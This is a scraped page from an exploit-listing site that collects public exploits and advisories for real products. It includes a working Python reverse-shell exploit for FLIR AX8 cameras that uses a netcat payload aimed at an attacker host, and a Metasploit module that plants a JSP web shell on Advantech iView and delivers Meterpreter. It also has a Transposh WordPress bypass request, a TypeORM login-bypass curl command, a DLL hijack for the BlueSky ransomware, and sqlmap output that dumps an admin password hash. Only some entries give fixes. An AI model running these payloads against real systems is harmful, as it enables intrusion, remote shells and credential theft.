Latest exploits :: CodePwn

<pre><code># -*- coding: utf-8 -*- # Exploit Title: FLIR AX8 Unauthenticated OS Command Injection # Date: 8/19/2022 # Exploit Author: Samy Younsi Naqwada (https://samy.link) # Vendor Homepage: https://www.flir.com/ # Software Link: https://www.flir.com/products/ax8-automation/ # PoC: https://www.youtube.com/watch?v=dh0_rfAIWok # Version: 1.46.16 and under. # Tested on: FLIR AX8 version 1.46.16 (Ubuntu) # CVE : CVE-2022-36266 from __future__ import print_function, unicode_literals from bs4 import BeautifulSoup import argparse import requests import json import urllib3 urllib3.disable_warnings() def banner(): flirLogo = """ ███████╗██╗ ██╗██████╗ ██╔════╝██║ ██║██╔══██╗ █████╗ ██║ ██║██████╔╝ ██╔══╝ ██║ ██║██╔══██╗ ██║ ███████╗██║██║ ██║ ╚═╝ ╚══════╝╚═╝╚═╝ ╚═╝ .---------------------. █████╗ ██╗ ██╗ █████╗ /--'--.------.--------/| ██╔══██╗╚██╗██╔╝██╔══██╗ |Say :) |__Ll__| [==] || ███████║ ╚███╔╝ ╚█████╔╝ |cheese!| .--. | '''' || ██╔══██║ ██╔██╗ ██╔══██╗ | |( () )| || ██║ ██║██╔╝ ██╗╚█████╔╝ | | `--` | |/ ╚═╝ ╚═╝╚═╝ ╚═╝ ╚════╝ `-------`------`------` \033[1;92mSamy Younsi (Necrum Security Labs)\033[1;m \033[1;91mFLIR AX8 Unauthenticated OS Command Injection\033[1;m FOR EDUCATIONAL PURPOSE ONLY. """ return print('\033[1;94m{}\033[1;m'.format(flirLogo)) def pingWebInterface(RHOST, RPORT): url = 'http://{}:{}/login/'.format(RHOST, RPORT) response = requests.get(url, allow_redirects=False, verify=False, timeout=60) try: if response.status_code != 200: print('[!] \033[1;91mError: FLIR AX8 device web interface is not reachable. Make sure the specified IP is correct.\033[1;m') exit() soup = BeautifulSoup(response.content.decode('utf-8'), 'html.parser') version = soup.find('p', id = 'login-title').string print('[INFO] {} detected.'.format(version)) except: print('[ERROR] Can\'t grab the device version...') def execReverseShell(RHOST, RPORT, LHOST, LPORT): url = 'http://{}:{}/res.php'.format(RHOST, RPORT) payload = 'rm%20%2Ftmp%2Ff%3Bmkfifo%20%2Ftmp%2Ff%3Bcat%20%2Ftmp%2Ff%7Csh%20-i%202%3E%261%7Cnc%20{}%20{}%20%3E%2Ftmp%2Ff'.format(LHOST, LPORT) data = 'action=alarm&id=2;{}'.format(payload) headers = { 'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8', } try: print('[INFO] Executing reverse shell...') response = requests.post(url, headers=headers, data=data, allow_redirects=False, verify=False) print('Reverse shell successfully executed. {}:{}'.format(LHOST, LPORT)) return except Exception as e: print('Reverse shell failed. Make sure the FLIR AX8 device can reach the host {}:{}').format(LHOST, LPORT) return False def main(): banner() args = parser.parse_args() pingWebInterface(args.RHOST, args.RPORT) execReverseShell(args.RHOST, args.RPORT, args.LHOST, args.LPORT) if __name__ == "__main__": parser = argparse.ArgumentParser(description='Script PoC that exploit an unauthenticated remote command injection on FLIR AX8 devices.', add_help=False) parser.add_argument('--RHOST', help="Refers to the IP of the target machine. (FLIR AX8 device)", type=str, required=True) parser.add_argument('--RPORT', help="Refers to the open port of the target machine.", type=int, required=True) parser.add_argument('--LHOST', help="Refers to the IP of your machine.", type=str, required=True) parser.add_argument('--LPORT', help="Refers to the open port of your machine.", type=int, required=True) main() </code></pre>

<pre><code># FLIR AX8 vulnerabilities. ### Product description: The FLIR AX8 is a thermal sensor with imaging capabilities, combining thermal and visual cameras that provides continuous temperature monitoring and alarming for critical electrical and mechanical equipment. ### Affected products: All FLIR AX8 thermal sensor cameras version up to and including `1.46.16`. ### Summary of the 4 vulnerabilities found / What we were able to find: * [CVE-2022-37061] - Unauthenticated OS Command Injection. FLIR AX8 is affected by an unauthenticated remote command injection vulnerability. This can be exploited to inject and execute arbitrary shell commands as the root user through the `id` HTTP POST parameter in `res.php` endpoint. A successful exploit could allow the attacker to execute arbitrary commands on the underlying operating system with the root privileges. This issue affects all FLIR AX8 thermal sensor cameras version up to and including `1.46.16`. * [CVE-2022-37060] - Unauthenticated Directory Traversal. FLIR AX8 is affected by a directory traversal vulnerability due to an improper access restriction. An unauthenticated, remote attacker can exploit this, by sending a URI that contains directory traversal characters, to disclose the contents of files located outside of the server's restricted path. This issue affects all FLIR AX8 thermal sensor cameras version up to and including `1.46.16`. * [CVE-2022-37062] - Improper Access Control. FLIR AX8 is affected by an insecure design vulnerability due to an improper directory access restriction. An unauthenticated, remote attacker can exploit this, by sending a URI that contains the path of the SQLite users database, and download it. A successful exploit could allow the attacker to extract usernames and hashed passwords. This issue affects all FLIR AX8 thermal sensor cameras version up to and including `1.46.16`. * [CVE-2022-37063] - Reflected cross-site scripting. FLIR AX8 is affected by a reflected cross-site scripting (XSS) vulnerability due to an improper input sanitization. An authenticated, remote attacker can execute arbitrary JavaScript code in the web management interface. A successful exploit could allow the attacker to insert malicious JavaScript code. This issue affects all FLIR AX8 thermal sensor cameras version up to and including `1.46.16`. ### Step by Step Example (How to Reproduce and verify) the vulnerabilities: 1. Unauthenticated Remote Command Injection. The endpoint `/res.php` can be called remotely without user authentication as there is no cookie verification `Cookie: PHPSESSID=ID` to check if the request is legitimate. The second problem is that the POST parameter `id` can be injected to execute any Linux command. In the example below we create a crafted query that displays the contents of the `/etc/shadow` file. The server returns a JSON response containing the contents of the `/etc/shadow` file. This command injection is due because there no sanitization check on the variable `$_POST["id"]`, line 65, and can therefore take advantage of the `shell_exec()` function to execute unexpected arbitrary shell commands. 2. Unauthenticated Directory Traversal. The endpoint `/download.php` can be called remotely without user authentication as there is no cookie verification `Cookie: PHPSESSID=ID` to check if the request is legitimate. The second problem is that the GET parameter `file` can be injected with a relative file paths and download any files in the system. In the example below we create a crafted query that download the contents of the `/etc/passwd` file. The error is due to the fact that there is no sanitization of the `$file_path` variable, line 26, when the `fopen()` function is called, line 39. However a comment in the code, line 24, and the use of the function `pathinfo()`, line 28, suggests that the developer thought about this problem and therefore created the variable `$path_parts` which is sanitized. But for some reasons the developer does not use the sanitizer variable `$path_parts` when the function `fopen()` is used. Probably an oversight. 3. Improper Access Control. The endpoint `/FLIR/db/users.db` can be called remotely without user authentication as there is no cookie verification `Cookie: PHPSESSID=ID` to check if the request is legitimate and let any malicious actor to download the `users.db` SQLite database. 4. Reflected cross-site scripting. In the settings tab, if a file with a filename that contains JavaScript code is selected via the update firmware file input the JavaScript code will be triggered and executed. In our example, we created a file call <img src=x onerror=alert(String.fromCharCode(97,108,101,114,116,40,39,116,101,115,116,39,41,59));>.run ### Recommendations for how to fix the 4 vulnerabilities: * Vulnerability 1: The variable `$_POST["id"]`, line 65 in the file `/FLIR/usr/www/res.php`, must be sanitized using the function `intval()` and will remove any character other than integer value. `escapeshellcmd()` and `escapeshellarg()` must be also used to escapes any characters in a string that might be used to execute arbitrary commands. More info: https://www.php.net/intval https://www.php.net/manual/en/function.escapeshellcmd https://www.php.net/manual/en/function.escapeshellarg * Vulnerability 2: The variable `$file_path`, line 39 in the file `/FLIR/usr/www/download.php`, must be sanitized using the function `pathinfo()` but also use a hard coded directory path, in case you need to manage several directories set a whitelist of all allowed directories and use multiple conditions. More info: https://www.php.net/manual/en/function.pathinfo * Vulnerability 3: Define a whitelist of all directories that a user is allowed to access. This can be added to the Lighttpd server configuration file, in `/etc/lighttpd.conf`. More info: https://www.cyberciti.biz/tips/howto-lighttpd-enable-disable-directory-listing.html * Vulnerability 4: To protect against filename XSS attack you can use a regex that will parse the filename to leave only numbers and letters. More info: https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html ### Reference: https://www.flir.com/products/ax8-automation/ ### Security researchers: * [Thomas Knudsen] (https://www.linkedin.com/in/thomasjknudsen) * [Samy Younsi] (https://www.linkedin.com/in/samy-younsi) </code></pre>

<pre><code>RCE Security Advisory https://www.rcesecurity.com 1. ADVISORY INFORMATION ======================= Product: Transposh WordPress Translation Vendor URL: https://wordpress.org/plugins/transposh-translation-filter-for-wordpress/ Type: Incorrect Authorization [CWE-863] Date found: 2022-07-23 Date published: 2022-08-16 CVSSv3 Score: 7.5 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N) CVE: CVE-2022-2536 2. CREDITS ========== This vulnerability was discovered and researched by Julien Ahrens from RCE Security. 3. VERSIONS AFFECTED ==================== Transposh WordPress Translation 1.0.8.1 and below 4. INTRODUCTION =============== Transposh translation filter for WordPress offers a unique approach to blog translation. It allows your blog to combine automatic translation with human translation aided by your users with an easy to use in-context interface. (from the vendor's homepage) 5. VULNERABILITY DETAILS ======================== When installed, Transposh comes with a set of pre-configured options; one of these is the "Who can translate" setting under the "Settings" tab. However, this option is ignored if Transposh has enabled its "autotranslate" feature (it's enabled by default) and the HTTP POST parameter "sr0" is larger than 0. This is caused by a faulty validation in "wp/transposh_db.php": if (!$by && !($all_editable && ($this->transposh->is_translator() || ($source > 0 && $this->transposh->options->enable_autotranslate)))) { tp_logger("Unauthorized translation attempt " . $_SERVER['REMOTE_ADDR'], 1); header("HTTP/1.0 401 Unauthorized translation"); exit; } Successful exploits can allow an unauthenticated attacker to bypass the Transposh permissions and add translations to the WordPress site, thereby influencing what is shown on the site. However, this only affects new translations. 6. PROOF OF CONCEPT =================== The following Proof-of-Concept adds a new translation POST /wp-admin/admin-ajax.php HTTP/1.1 Host: [host] Content-Length: 74 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 User-Agent: Mozilla/5.0 Connection: close action=tp_translation&ln0=en&sr0=1&items=1&tk0=translation&tr0=translation 7. SOLUTION =========== None. Remove the plugin to prevent exploitation. 8. REPORT TIMELINE ================== 2022-07-23: Discovery of the vulnerability 2022-07-23: CVE requested from Wordfence (CNA) 2022-07-25: Wordfence assigns CVE-2022-2536 2022-08-09: Sent note to vendor 2022-08-09: Vendor is aware of this bug, but there is no plan to fix it yet 2022-08-16: Public Disclosure 9. REFERENCES ============= https://github.com/MrTuxracer/advisories </code></pre>

<pre><code>## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::CmdStager include Msf::Exploit::Remote::HttpClient prepend Msf::Exploit::Remote::AutoCheck include Msf::Exploit::FileDropper def initialize(info = {}) super( update_info( info, 'Name' => 'Advantech iView NetworkServlet Command Injection', 'Description' => %q{ Versions of Advantech iView software below `5.7.04.6469` are vulnerable to an unauthenticated command injection vulnerability via the `NetworkServlet` endpoint. The database backup functionality passes a user-controlled parameter, `backup_file` to the `mysqldump` command. The sanitization functionality only tests for SQL injection attempts and directory traversal, so leveraging the `-r` and `-w` `mysqldump` flags permits exploitation. The command injection vulnerability is used to write a payload on the target and achieve remote code execution as NT AUTHORITY\SYSTEM. }, 'License' => MSF_LICENSE, 'Author' => [ 'rgod', # Vulnerability discovery 'y4er', # PoC 'Shelby Pace' # Metasploit module ], 'References' => [ [ 'URL', 'https://y4er.com/post/cve-2022-2143-advantech-iview-networkservlet-command-inject-rce/'], [ 'CVE', '2022-2143'] ], 'Platform' => [ 'win' ], 'Privileged' => true, 'Arch' => [ ARCH_X86, ARCH_X64, ARCH_CMD ], 'Targets' => [ [ 'Windows Dropper', { 'Arch' => [ ARCH_X86, ARCH_X64 ], 'Type' => :win_dropper, 'CmdStagerFlavor' => [ 'psh_invokewebrequest', 'vbs' ], 'DefaultOptions' => { 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp' } } ], [ 'Windows Command', { 'Arch' => ARCH_CMD, 'Type' => :win_cmd, 'DefaultOptions' => { 'PAYLOAD' => 'cmd/windows/powershell_reverse_tcp' } } ] ], 'DisclosureDate' => '2022-06-28', 'DefaultTarget' => 0, 'Notes' => { 'Stability' => [ CRASH_SAFE ], 'Reliability' => [ REPEATABLE_SESSION ], 'SideEffects' => [ IOC_IN_LOGS, ARTIFACTS_ON_DISK ] } ) ) register_options( [ Opt::RPORT(8080), OptString.new('TARGETURI', [ true, 'The base path to Advantech iView', '/iView3']), OptString.new('USERNAME', [ false, 'The user name to authenticate with', 'admin']), OptString.new('PASSWORD', [ false, 'The password to authenticate with', 'password']) ] ) end def check res = send_request_cgi!( 'method' => 'GET', 'uri' => normalize_uri(target_uri.path) ) return CheckCode::Unknown('Failed to receive a response from the application') unless res unless res.body.include?('iView') return CheckCode::Safe('No confirmation that target is Advantech iView') end res = send_db_backup_request('') return CheckCode::Detected('Failed to receive response from backup request') unless res # The patch added auth as a requirement for # accessing the NetworkServlet endpoint if res.body =~ /ERROR:\s+User\s+Not\sLogin/ @needs_auth = true print_status('Vulnerability is present, though authentication is required.') end CheckCode::Appears end def send_db_backup_request(filename) send_request_cgi( 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, 'NetworkServlet'), 'keep_cookies' => true, 'vars_post' => { 'page_action_type' => 'backupDatabase', 'backup_filename' => filename } ) end def format_jsp bin_nums = [] arg_nums = [] flag_nums = [] bin_param.each_char { |c| bin_nums << c.ord } bin_nums = bin_nums.join(',') arg_param.each_char { |c| arg_nums << c.ord } arg_nums = arg_nums.join(',') flag_param.each_char { |c| flag_nums << c.ord } flag_nums = flag_nums.join(',') '<%=new String(com.sun.org.apache.xml.internal.security.utils.JavaUtils.getBytesFromStream((' \ 'new ProcessBuilder(request.getParameter(' \ "new java.lang.String(new byte[]{#{bin_nums}}))," \ "request.getParameter(new java.lang.String(new byte[]{#{flag_nums}}))," \ "request.getParameter(new java.lang.String(new byte[]{#{arg_nums}}))).start())" \ '.getInputStream()))%>' end def flag_param @flag_param ||= Rex::Text.rand_text_alpha(3..8) end def arg_param @arg_param ||= Rex::Text.rand_text_alpha(3..8) end def bin_param @bin_param ||= Rex::Text.rand_text_alpha(3..8) end def jsp_filename @jsp_filename ||= "#{Rex::Text.rand_text_alpha(5..12)}.jsp" end def execute_command(cmd, _opts = {}) send_request_cgi( 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, jsp_filename), 'keep_cookies' => true, 'vars_get' => { bin_param => 'cmd.exe', flag_param => '/c', arg_param => cmd } ) end def iview_authenticate res = send_request_cgi!( 'method' => 'GET', 'uri' => normalize_uri(target_uri.path) ) fail_with(Failure::UnexpectedReply, 'Login page not found') unless res && res.body.include?('loginWindow') vprint_good('Successfully accessed the login page') res = send_request_cgi( 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, 'CommandServlet'), 'keep_cookies' => true, 'vars_post' => { 'page_action_service' => 'UserServlet', 'page_action_type' => 'login', 'user_name' => datastore['USERNAME'], 'user_password' => datastore['PASSWORD'], 'use_ldap' => 'false', 'data' => '' } ) unless res && res.body.include?('Success') fail_with(Failure::BadConfig, 'Authentication failed. Credentials likely incorrect.') end vprint_good('Authentication successful!') end def need_auth? res = send_request_cgi( 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, 'NetworkServlet') ) return false unless res !!(res.body =~ /ERROR:\s+User\s+Not\sLogin/) end def exploit if @needs_auth || need_auth? iview_authenticate end jsp_code = format_jsp sql_filename = "#{Rex::Text.rand_text_alpha(5..12)}.sql" full_cmd = "#{sql_filename}\" -r \"./webapps/iView3/#{jsp_filename}\" -w \"#{jsp_code}\"" res = send_db_backup_request(full_cmd) fail_with(Failure::UnexpectedReply, 'Failed to write JSP file to target') unless res path = "webapps\\iView3\\#{jsp_filename}" register_file_for_cleanup(path) if target['Type'] == :win_dropper execute_cmdstager else execute_command(payload.encoded) end end end </code></pre>

<pre><code># Trovent Security Advisory 2110-01 # ##################################### Insecure data storage in Polar Flow Android application ####################################################### Overview ######## Advisory ID: TRSA-2110-01 Advisory version: 1.0 Advisory status: Public Advisory URL: https://trovent.io/security-advisory-2110-01 Affected product: Polar Flow Android mobile application (fi.polar.polarflow) Affected version: 5.7.1 Vendor: Polar Electro, https://flow.polar.com Credits: Trovent Security GmbH, Karima Hebbal Detailed description #################### The Polar Flow app is a sports, fitness and activity analyzer which allows to plan and monitor training, daily activity and sleep. Trovent Security GmbH discovered that the application stores the username and password in clear text in a file on the mobile device. Severity: Medium CVSS Score: 4.4 (CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N) CVE ID: N/A CWE ID: CWE-312 Proof of concept ################ Content of the file /data/data/fi.polar.polarflow/shared_prefs/UserData3.xml: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ <?xml version='1.0' encoding='utf-8' standalone='yes' ?> <map> <string name="current_device_id">no_device</string> <int name="last_version_code" value="5070103" /> <string name="base_url">https://www.polarremote.com/v2/users/54871065</string> <string name="last_name">Ptest</string> <int name="key_initial_view_resource_id" value="2131363187" /> <boolean name="valid_ver_two" value="true" /> <long name="problem_phone_message_time" value="1634888249727" /> <boolean name="new_blogs_available" value="true" /> <string name="address_json">{"city":"\u003cscript\u003ealert(1)\u003c/script\ u003e","countryCode":"DE","modified":"2021-10-22T07:37:5 3.000Z"}</string> <string name="profile_json">{"favoriteSports":[]}</string> <string name="password">Test2021</string> <string name="last_blog_sync_time">2021-10-22T09:37:18.309</string> <long name="user_id" value="54871065" /> <boolean name="initial_remote_sync_executed" value="true" /> <string name="preferred_blog_language">en</string> <int name="key_training_diary_tab" value="0" /> <string name="first_name">Ptest</string> <int name="should_show_problem_phone_message" value="2" /> <string name="username">ptesttest11@gmail.com</string> </map> ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Solution / Workaround ##################### We recommend not to store sensitive information in clear text on the mobile device. Fixed in version 6.3.0, verified by Trovent. History ####### 2021-10-18: Vulnerability found 2021-12-15: Vendor contacted 2022-01-20: Contacted vendor again 2022-01-21: Vendor replied that the vulnerability will be checked 2022-01-28: Vendor replied, the vulnerability will be fixed in a future update 2022-07-27: Vendor contacted, asking for status 2022-08-09: Vendor replied, the vulnerability is fixed since version 6.3.0 2022-08-17: Trovent verified remediation of the vulnerability 2022-08-18: Advisory published </code></pre>

<pre><code>I found what I think is a vulnerability in the latest typeorm 0.3.7. TypeORM v0.3 has a new findOneBy method instead of findOneById() and it is the only way to get a record by id Sending undefined as a value in this method removes this parameter from the query. This leads to the data exposure. For example: Users.findOneBy({id: req.query.id}) with /?id=12345 produces SELECT * FROM Users WHERE id=12345 LIMIT 1 while removing id from the query string produces SELECT * FROM Users LIMIT 1 Maintainer also does not consider this a vulnerability and stated the root cause is bad input validation. I tried to contact Snyk, but they took the author's position. I still think it is a major vulnerability Vulnerable app: import { Entity, PrimaryGeneratedColumn, Column, Connection, ConnectionOptions, Repository, createConnection } from 'typeorm'; import express from 'express'; import {Application, Request, Response} from 'express'; let connection: Connection; async function myListener(request: Request, response: Response) { if(!connection) connection = await createConnection(connectionOpts); const userRepo: Repository<User> = connection.getRepository(User); const { email, password }: Record<string, string> = request.body; const user = await userRepo.findOneBy({ email, password }); return response.json(user ? 'ok' : 'denied'); } @Entity({ name: 'Users' }) class User { @PrimaryGeneratedColumn() id!: number; @Column() email!: string; @Column() password!: string; } const connectionOpts: ConnectionOptions = { type: 'mysql', name: 'myconnection', host: 'localhost', username: 'root', password: 'test123', database: 'domurl', entities: [User] } const app: Application = express(); app.use(express.json()); app.post( "/authenticate", myListener); app.listen(4444, () => console.log('App started')); Usage: curl http://127.0.0.1:4444/authenticate -H 'Content-Type: application/json' --data '{"email": "Flo64@yahoo.com", "password": "incorrect"}' "denied"⏎ Exploit: curl http://127.0.0.1:4444/authenticate -H 'Content-Type: application/json' --data '{"email": "Flo64@yahoo.com"}' "ok"⏎ </code></pre>

<pre><code>Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2022 Original source: https://malvuln.com/advisory/961fa85207cdc4ef86a076bbff07a409.txt Contact: malvuln13@gmail.com Media: twitter.com/malvuln Threat: Win32.Ransom.BlueSky Vulnerability: Arbitrary Code Execution Description: The BlueSky ransomware looks for and executes arbitrary DLLs in its current working directory. Therefore, we can hijack a vuln DLL, execute our own code, control and terminate the malware pre-encryption. The exploit dll checks if the current directory is "C:\Windows\System32", if not we grab our own process ID and terminate. All basic tests were conducted successfully in a virtual machine environment. Family: BlueSky Type: PE32 MD5: 961fa85207cdc4ef86a076bbff07a409 Vuln ID: MVID-2022-0632 Disclosure: 08/13/2022 PoC Video URL: https://www.youtube.com/watch?v=osuS8GjdERM Exploit/PoC: 1) Compile the following C code as "CRYPTSP.dll" 32-bit 2) Place the DLL in same directory as the vuln BlueSky ransomware 3) Run malware #include "windows.h" //By malvuln - August 2022 //Purpose: PWN BlueSky ransomware MD5: 961fa85207cdc4ef86a076bbff07a409 //gcc -c CRYPTSP.c -m32 //gcc -shared -o CRYPTSP.dll CRYPTSP.o -m32 /** DISCLAIMER: Author is NOT responsible for any damages whatsoever by using this software or improper malware handling. By using this code you assume and accept all risk implied or otherwise. **/ BOOL APIENTRY DllMain(HINSTANCE hInst, DWORD reason, LPVOID reserved){ switch (reason) { case DLL_PROCESS_ATTACH: MessageBox(NULL, "BlueSky Ransom\nPWNED!!! by Malvuln", "Code Exec PoC", MB_OK); TCHAR buf[MAX_PATH]; if(GetCurrentDirectory(MAX_PATH, buf)) if(strcmp("C:\\Windows\\System32", buf) != 0){ HANDLE handle = OpenProcess(PROCESS_TERMINATE, FALSE, getpid()); if (NULL != handle) { TerminateProcess(handle, 0); CloseHandle(handle); } } break; } return TRUE; } Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM). </code></pre>

<pre><code>┌┌───────────────────────────────────────────────────────────────────────────────────────┐ ││ C r a C k E r ┌┘ ┌┘ T H E C R A C K O F E T E R N A L M I G H T ││ └───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌──── From The Ashes and Dust Rises An Unimaginable crack.... ────┐ ┌┌───────────────────────────────────────────────────────────────────────────────────────┐ ┌┘ [ Exploits ] ┌┘ └───────────────────────────────────────────────────────────────────────────────────────┘┘ : Author : CraCkEr │ │ : │ Website : inoutscripts.com │ │ │ │ Vendor : Inout Scripts │ │ │ │ Software : Inout RealEstate 2.1.2 │ │ Inout RealEstate is an easy, flexible │ │ Vuln Type: Remote SQL Injection │ │ and simple property management solution │ │ Method : GET │ │ ideal for business start-ups │ │ Impact : Database Access │ │ │ │ │ │ │ │────────────────────────────────────────────┘ └─────────────────────────────────────────│ │ B4nks-NET irc.b4nks.tk #unix ┌┘ └───────────────────────────────────────────────────────────────────────────────────────┘┘ : : │ Release Notes: │ │ ═════════════ │ │ Typically used for remotely exploitable vulnerabilities that can lead to │ │ system compromise. │ │ │ ┌┌───────────────────────────────────────────────────────────────────────────────────────┐ ┌┘ ┌┘ └───────────────────────────────────────────────────────────────────────────────────────┘┘ Greets: The_PitBull, Raz0r, iNs, Sad, His0k4, Hussin X, Mr. SQL Phr33k , NK, GoldenX, Wehla, Cap, DarkCatSpace, R0ot, KnG, Centerk, chamanwal loool, DevS, Dark-Gost, Carlos132sp, ProGenius, bomb, fjear, H3LLB0Y, ix7 CryptoJob (Twitter) twitter.com/CryptozJob ┌┌───────────────────────────────────────────────────────────────────────────────────────┐ ┌┘ © CraCkEr 2022 ┌┘ └───────────────────────────────────────────────────────────────────────────────────────┘┘ POST parameter 'lidaray' is vulnerable. --- Parameter: lidaray (POST) Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: lidaray=20MKTTVT24' AND (SELECT 1823 FROM (SELECT(SLEEP(5)))Caim) AND 'bHOb'='bHOb --- [INFO] the back-end DBMS is MySQL [INFO] fetching current database current database: 'inout_realestate' fetching tables for database: 'inout_realestate' Database: inout_realestate [45 tables] +--------------------------------+ | adcode | | admin_account | | admin_payment_details | | agent_list_request_to_user | | broker_citymap | | broker_rate | | broker_review | | brokerabusereport | | category_property | | chat_details | | chat_messages | | checkout_ipn | | countries | | custom_field | | detail_statistics_list | | email_templates | | enquiry_status | | forgetpassword | | inout_ipns | | invoicegen | | languages | | list_brokermap | | list_images | | list_main | | listopenhouse | | normal_statistics_list | | paymentdetailstat | | ppc_currency | | public_side_media_detail | | public_slide_images | | pupularsiarchlist | | recentsearchlist | | settings | | sold_listing | | soldlistadd | | traveller_bank_deposit_history | | user_broker_licenses | | user_broker_registration | | user_email_verification | | user_list_agent_request | | user_registration | | user_wishlist_mapping | | userabusereport | | userlistactive | | wish_list | +--------------------------------+ [INFO] fetching columns for table 'admin_account' in database 'inout_realestate' Database: inout_realestate Table: admin_account [6 columns] +------------+--------------+ | Column | Type | +------------+--------------+ | admin_type | tinyint(4) | | id | int(11) | | logouttime | int(11) | | password | varchar(255) | | status | tinyint(4) | | username | varchar(200) | +------------+--------------+ [INFO] fetching entries of column(s) 'admin_type,id,password,username' for table 'admin_account' in database 'inout_realestate' Database: inout_realestate Table: admin_account [1 entry] +----+----------+------------------------------------------+------------+ | id | username | password | admin_type | +----+----------+------------------------------------------+------------+ | 1 | admin | 21232f297a57a5a743894a0e4a801fc3 (admin) | 0 | +----+----------+------------------------------------------+------------+ [-] Done </code></pre>